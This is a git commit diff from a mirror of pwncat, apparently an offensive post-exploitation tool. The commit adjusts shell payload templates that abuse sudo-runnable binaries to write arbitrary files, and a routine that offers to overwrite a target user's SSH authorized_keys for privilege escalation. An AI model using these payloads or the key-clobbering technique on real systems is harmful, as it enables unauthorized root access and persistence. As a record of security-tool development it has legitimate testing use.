1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-27 19:04:15 +01:00

Tested authorized_keys clobbering with only a file-write primitive

This commit is contained in:
Caleb Stewart 2020-05-13 17:51:39 -04:00
parent 38d16794fe
commit b9f3a572a7
2 changed files with 12 additions and 6 deletions

View File

@ -55,14 +55,20 @@
{ {
"type": "write", "type": "write",
"stream": "print", "stream": "print",
"payload": "TF=$({mktemp}); {cat} - > $TF; {command}; rm -f $TF", // This is weird because under the case where we are running w/ sudo,
// we need to ask for the password first. The first "{command}" will
// ask for the sudo password, then fail to copy. The second "{command}"
// will not ask for the sudo password, and then the copy will succeed.
// Without sudo, the first command will simply fail, and the second
// will succeed. This is the same for the other `cp` payload below.
"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {cat} > $TF; {command}; rm -f $TF",
"args": ["$TF", "{lfile}"], "args": ["$TF", "{lfile}"],
"exit": "{ctrl_d}" "exit": "{ctrl_d}"
}, },
{ {
"type": "write", "type": "write",
"stream": "base64", "stream": "base64",
"payload": "TF=$({mktemp}); {base64} -d > $TF; {command}; rm -f $TF", "payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
"args": ["$TF", "{lfile}"], "args": ["$TF", "{lfile}"],
"exit": "{ctrl_d}" "exit": "{ctrl_d}"
} }

View File

@ -22,7 +22,7 @@ from pwncat import util
# privesc_methods = [SetuidMethod, SuMethod] # privesc_methods = [SetuidMethod, SuMethod]
# privesc_methods = [SuMethod, SudoMethod, SetuidMethod, DirtycowMethod, ScreenMethod] # privesc_methods = [SuMethod, SudoMethod, SetuidMethod, DirtycowMethod, ScreenMethod]
# privesc_methods = [SuMethod, SudoMethod, ScreenMethod, SetuidMethod] # privesc_methods = [SuMethod, SudoMethod, ScreenMethod, SetuidMethod]
privesc_methods = [SuMethod, SudoMethod, SetuidMethod] privesc_methods = [SuMethod, SudoMethod]
class Finder: class Finder:
@ -160,7 +160,7 @@ class Finder:
for tech in found_techniques: for tech in found_techniques:
if ( if (
tech.user == target_user tech.user == target_user
and Capability.READ in tech.capabilities and Capability.WRITE in tech.capabilities
): ):
try: try:
tech.method.write_file(filename, data, tech) tech.method.write_file(filename, data, tech)
@ -512,9 +512,9 @@ class Finder:
) )
util.warn(f"however, we do have a writer.") util.warn(f"however, we do have a writer.")
response = confirm( response = confirm(
"would you like to clobber their authorized keys?", suffix="(y/N)" "would you like to clobber their authorized keys? ", suffix="(y/N) "
) )
if response.lower() != "y": if not response:
raise PrivescError("user aborted key clobbering") raise PrivescError("user aborted key clobbering")
# If we don't already know a private key, then we need a writer # If we don't already know a private key, then we need a writer